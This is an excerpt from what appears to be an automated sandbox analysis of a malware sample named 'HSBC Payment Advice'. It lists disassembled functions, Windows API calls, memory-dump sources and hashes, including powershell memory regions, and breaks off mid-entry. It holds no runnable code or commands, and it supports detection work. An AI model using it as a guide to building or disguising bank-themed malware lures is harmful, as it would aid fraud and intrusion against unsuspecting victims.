          • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
          Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
          Download Yara Rule
          APIs
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
          • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseOpenQueryValue
          • String ID: : Completed
          • API String ID: 3677997916-2954849223
          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
          • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
          • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
          Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
          Download Yara Rule
          APIs
          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00405939
          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00405943
          • lstrcatW.KERNEL32(?,00409014), ref: 00405955
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CharPrevlstrcatlstrlen
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 2659869361-3355392842
          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
          • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
          • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
          Download Yara Rule
          APIs
          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
          • String ID:
          • API String ID: 1404258612-0
          • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
          • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
          • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
          • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
          Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
          Download Yara Rule
          APIs
          • IsWindowVisible.USER32(?), ref: 00405135
          • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
            • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Window$CallMessageProcSendVisible
          • String ID:
          • API String ID: 3748168415-3916222277
          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
          • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
          • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
          Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
          Download Yara Rule
          APIs
          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76702EE0,004037F4,76703420,0040361F,?), ref: 00403837
          • GlobalFree.KERNEL32(?), ref: 0040383E
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Free$GlobalLibrary
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 1100898210-3355392842
          • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
          • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
          • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
          • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
          Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
          Download Yara Rule
          APIs
          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CharPrevlstrlen
          • String ID: C:\Users\user\Desktop
          • API String ID: 2709904686-3370423016
          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
          • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
          • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
          Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
          Download Yara Rule
          APIs
          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
          • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
          • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
          • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: lstrlen$CharNextlstrcmpi
          • String ID:
          • API String ID: 190613189-0
          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
          • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
          • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

          Executed Functions

          Function 04649AE8 Relevance: .7, Instructions: 710COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0067d97a36647da19639afc8d5bebd8038131c3e62933a9ee56d916bb5a55f45
          • Instruction ID: ec44a9b076b5f65d32047b65ffc5eb23dc0734c49beef7a1748df6aab2e07d7a
          • Opcode Fuzzy Hash: 0067d97a36647da19639afc8d5bebd8038131c3e62933a9ee56d916bb5a55f45
          • Instruction Fuzzy Hash: D3525A74B40219EBDF25CFA4D4947AEBBB2AFC9304F104199D406AB351EB34AD86CF91
          Function 0464EC18 Relevance: .3, Instructions: 256COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c5a7d727252de47f321065db2191f607c74dbed9cf58e197b4f158c7100fa98e
          • Instruction ID: dc22b136518bca1e1e2c3cf7a29bf0402a005fdcb3a927b125b45d87a7ece5e2
          • Opcode Fuzzy Hash: c5a7d727252de47f321065db2191f607c74dbed9cf58e197b4f158c7100fa98e
          • Instruction Fuzzy Hash: D3911C71F106145BEF19DFB998109AEBBE3AFC4710B00891DD016AB340DF79AA058BD6
          Function 0464EC28 Relevance: .3, Instructions: 252COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6f376b7fec58dedf9e32170c2f51f4a4e590d1f218b155ad370d60c47fc730e9
          • Instruction ID: 27766aa525e47aa5697af35ea2aa78b434e94d5d2d310f95381526c5d0252f7b
          • Opcode Fuzzy Hash: 6f376b7fec58dedf9e32170c2f51f4a4e590d1f218b155ad370d60c47fc730e9
          • Instruction Fuzzy Hash: 25911D71F106645BEF19DFB998109AEBBF3AFC4710B00891DD016AB340DF79AA058BD6
          Function 075E3278 Relevance: 27.2, Strings: 21, Instructions: 979COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$(.5l$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4\Dm$4\Dm$4\Dm$4\Dm$@bDm$@bDm$@bDm$@bDm$\}?m$\}?m$GDm$GDm
          • API String ID: 0-3543860342
          • Opcode ID: 9c1aa06b10e909df7e8c8dfaeadff133b831548595eaa8435110f4a625e1c17e
          • Instruction ID: 3714009bb99d302cba05fc3b635beeed3552dc2787899e21d039f6bb1218909f
          • Opcode Fuzzy Hash: 9c1aa06b10e909df7e8c8dfaeadff133b831548595eaa8435110f4a625e1c17e
          • Instruction Fuzzy Hash: A68290B4B002559FEB18CB65C945BAABBB2FF85300F14C0AAD9099F355CB71DD82CB91
          Function 08E00C18 Relevance: 17.4, Strings: 13, Instructions: 1137COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91928051440.0000000008E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E00000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_8e00000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$(.5l$4\Dm$4\Dm$4\Dm$4\Dm$@bDm$@bDm$GDm$GDm$GDm$GDm
          • API String ID: 0-512841179
          • Opcode ID: 579752ca8c292155755dadd64263cf54227ba8986cbeb2619b3ee91dfb135930
          • Instruction ID: ddc403a42d10cb2088ada3c3a48b605c13cb2992de39d3cb0d9298f2aa5c6949
          • Opcode Fuzzy Hash: 579752ca8c292155755dadd64263cf54227ba8986cbeb2619b3ee91dfb135930
          • Instruction Fuzzy Hash: 62928076B00244DFEB14CBA8C450BAAB7B2AF89316F14D46AD8059F395CB71DC82CF91
          Function 075E4710 Relevance: 15.4, Strings: 12, Instructions: 373COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4\Dm$4\Dm$@bDm$@bDm
          • API String ID: 0-2443436435
          • Opcode ID: 93679f834f8935504f4ea8a7afe3c0ef3e6daf4958853b93d931ba60b87a71e2
          • Instruction ID: ef9bfa1be6722ea68b8432e87be59cca0ce3b29bbf5d8b82656d0345f283d935
          • Opcode Fuzzy Hash: 93679f834f8935504f4ea8a7afe3c0ef3e6daf4958853b93d931ba60b87a71e2
          • Instruction Fuzzy Hash: 7BE1BBB4B01285DBEB08DFA4C445BAEB7B6AF88704F50C46AE5056F355CB71EC82CB91
          Function 075E7F30 Relevance: 13.1, Strings: 10, Instructions: 579COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$$rDm$$rDm$GDm$GDm$GDm$GDm$GDm$GDm
          • API String ID: 0-911605312
          • Opcode ID: 0c2b1aae45742936a1865dbc4c3be9fee1585a4783265de079ffef53705682c6
          • Instruction ID: 3832987a87dfd2126353cd8bd7c96f22f0f29a2b740860b502cd893a176dbcca
          • Opcode Fuzzy Hash: 0c2b1aae45742936a1865dbc4c3be9fee1585a4783265de079ffef53705682c6
          • Instruction Fuzzy Hash: CB123AB5B043528FDB199B6994007EBBBAAAFC6210F14C46BD505CF251DB71EC42C792
          Function 075ED90A Relevance: 12.8, Strings: 10, Instructions: 333COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$4[Dm$4[Dm$4[Dm$4[Dm$4\Dm$4\Dm$@bDm$@bDm
          • API String ID: 0-3276008725
          • Opcode ID: b89a8b9fdfee08de11dd8c1b5d71106615c9dc0cb8af33a75e334efa7cdd5537
          • Instruction ID: 950e7cf546b29488d80de81e20136ba4cc672457442207e419aa61c3df7dfbd8
          • Opcode Fuzzy Hash: b89a8b9fdfee08de11dd8c1b5d71106615c9dc0cb8af33a75e334efa7cdd5537
          • Instruction Fuzzy Hash: 3AE13DB4B003159FEB68CB64C945BAAB7B6BF85300F1081A9D5496F346CB71ED81CF91
          Function 075E4D68 Relevance: 9.8, Strings: 7, Instructions: 1056COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$(.5l$4\Dm$4\Dm$@bDm$@bDm
          • API String ID: 0-498408054
          • Opcode ID: d322133ca205503d58b523b89b58ebbccae904af5451762d2de9afe551614f1d
          • Instruction ID: 19a8be20b6e7b6cdcabee8e734bb6c50b586687b79718c2549d1af2a48ed984c
          • Opcode Fuzzy Hash: d322133ca205503d58b523b89b58ebbccae904af5451762d2de9afe551614f1d
          • Instruction Fuzzy Hash: B4A29FB4B00215DFE718CB65C945BAEB7B2BB89314F208569D505AF346CBB2EC92CF41
          Function 075E40A0 Relevance: 9.4, Strings: 7, Instructions: 644COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4[Dm$4[Dm$4[Dm$\}?m$\}?m$\}?m$\}?m
          • API String ID: 0-2740048210
          • Opcode ID: 2efd52fc6549c9ae728f5e04e2646e146e1301d1252cdca3e71cf7b2050e603c
          • Instruction ID: dd13317c77147b7cf8a82069951291c526f00130422d9036c1cdd2d20cabc781
          • Opcode Fuzzy Hash: 2efd52fc6549c9ae728f5e04e2646e146e1301d1252cdca3e71cf7b2050e603c
          • Instruction Fuzzy Hash: A1522DB4B012559FEB54CB64C945FA9B7B2BF84304F10C0A9E9099F356CA72ED82CF91
          Function 075ED3D1 Relevance: 8.1, Strings: 6, Instructions: 620COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4[Dm$4[Dm$4[Dm$\}?m$\}?m$\}?m
          • API String ID: 0-2484994598
          • Opcode ID: 132c902850f53921c758c5b9eddb1d42a22d7fde7553f4360a91449ac8826681
          • Instruction ID: 9e56ec6a46d7ccb98379d7e24b923c88682cc4737819dff39036284781a57ba5
          • Opcode Fuzzy Hash: 132c902850f53921c758c5b9eddb1d42a22d7fde7553f4360a91449ac8826681
          • Instruction Fuzzy Hash: 7B422CB8B002159FE714CB64CD51FAAB7B2EF89704F1084A5D9096F395CA72ED82CF91
          Function 075ECBE0 Relevance: 8.0, Strings: 6, Instructions: 501COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: (.5l$4[Dm$4[Dm$4[Dm$\}?m$\}?m
          • API String ID: 0-2633097208
          • Opcode ID: d8d58670fe8843d0c9e381dfe00c1b453992527eccb540e97f3ef9e1dc0039c0
          • Instruction ID: 0cd38556a14bef705a3000ace7829bd566a5ae6165815f3d2a7f458072804942
          • Opcode Fuzzy Hash: d8d58670fe8843d0c9e381dfe00c1b453992527eccb540e97f3ef9e1dc0039c0
          • Instruction Fuzzy Hash: B32239B4B012149FE714DB64C955FAAB7B2EF89704F1084A9D9096F395CB72EC82CF90
          Function 075E46F2 Relevance: 7.8, Strings: 6, Instructions: 309COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
